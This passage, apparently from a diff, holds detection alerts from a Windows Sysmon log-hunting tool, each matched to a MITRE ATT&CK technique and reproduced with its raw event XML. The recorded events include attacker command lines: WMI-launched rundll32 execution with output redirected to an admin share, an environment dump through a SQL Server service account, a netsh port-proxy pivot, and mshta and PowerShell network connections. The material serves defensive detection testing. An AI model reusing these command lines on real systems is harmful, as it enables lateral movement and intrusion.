+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
+    </TimeCreated>
+    <EventRecordID>421227</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
+    <Data Name=""ProcessId"">2784</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.16 ) to hostname (  ) , IP ( 10.0.2.17 ) and port ( 55683 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T01:29:05.534521Z"">
+    </TimeCreated>
+    <EventRecordID>17590</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2000"" ThreadID=""1980"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 01:29:00.318</Data>
+    <Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
+    <Data Name=""ProcessId"">1932</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">false</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.16</Data>
+    <Data Name=""SourceHostname"">IEWIN7</Data>
+    <Data Name=""SourcePort"">49168</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">10.0.2.17</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">55683</Data>
+    <Data Name=""DestinationPortName""></Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
+    </TimeCreated>
+    <EventRecordID>421227</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
+    <Data Name=""ProcessId"">2784</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
+    </TimeCreated>
+    <EventRecordID>421227</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
+    <Data Name=""ProcessId"">2784</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c set &gt; c:\users\\public\netstat.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-11-03T13:51:58.263043Z"">
+    </TimeCreated>
+    <EventRecordID>56509</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3180"" ThreadID=""4224"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-11-03 13:51:56.380</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DB7C-5DBE-0000-0010CF6B9502</Data>
+    <Data Name=""ProcessId"">5004</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c set &gt; c:\users\\public\netstat.txt</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\sqlsvc</Data>
+    <Data Name=""LogonGuid"">747F3D96-CE3B-5DBE-0000-00201ED50100</Data>
+    <Data Name=""LogonId"">0x1d51e</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-CE42-5DBE-0000-0010EE430200</Data>
+    <Data Name=""ParentProcessId"">3936</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe&quot; -sSQLEXPRESS</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-12-15T15:00:15.695478Z"">
+    </TimeCreated>
+    <EventRecordID>589975</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3524"" ThreadID=""4288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-12-15 15:00:14.470</Data>
+    <Data Name=""ProcessGuid"">747F3D96-CF4B-5FD8-0000-00101AD58700</Data>
+    <Data Name=""ProcessId"">6976</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10</Data>
+    <Data Name=""SourcePort"">50008</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">10.0.2.17</Data>
+    <Data Name=""DestinationHostname"">MSEDGEWIN10CLONE</Data>
+    <Data Name=""DestinationPort"">49666</Data>
+    <Data Name=""DestinationPortName""></Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:58.543692Z"">
+    </TimeCreated>
+    <EventRecordID>4948</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:58.355</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-001029398B00</Data>
+    <Data Name=""ProcessId"">6760</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
+    </TimeCreated>
+    <EventRecordID>17589</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2000"" ThreadID=""1960"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
+    <Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
+    <Data Name=""ProcessId"">1932</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
+    <Data Name=""LogonId"">0x1070ce</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
+    <Data Name=""ParentProcessId"">596</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
+    </TimeCreated>
+    <EventRecordID>17589</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2000"" ThreadID=""1960"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
+    <Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
+    <Data Name=""ProcessId"">1932</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
+    <Data Name=""LogonId"">0x1070ce</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
+    <Data Name=""ParentProcessId"">596</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting  Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
+    </TimeCreated>
+    <EventRecordID>17589</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2000"" ThreadID=""1960"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
+    <Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
+    <Data Name=""ProcessId"">1932</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
+    <Data Name=""LogonId"">0x1070ce</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
+    <Data Name=""ParentProcessId"">596</Data>
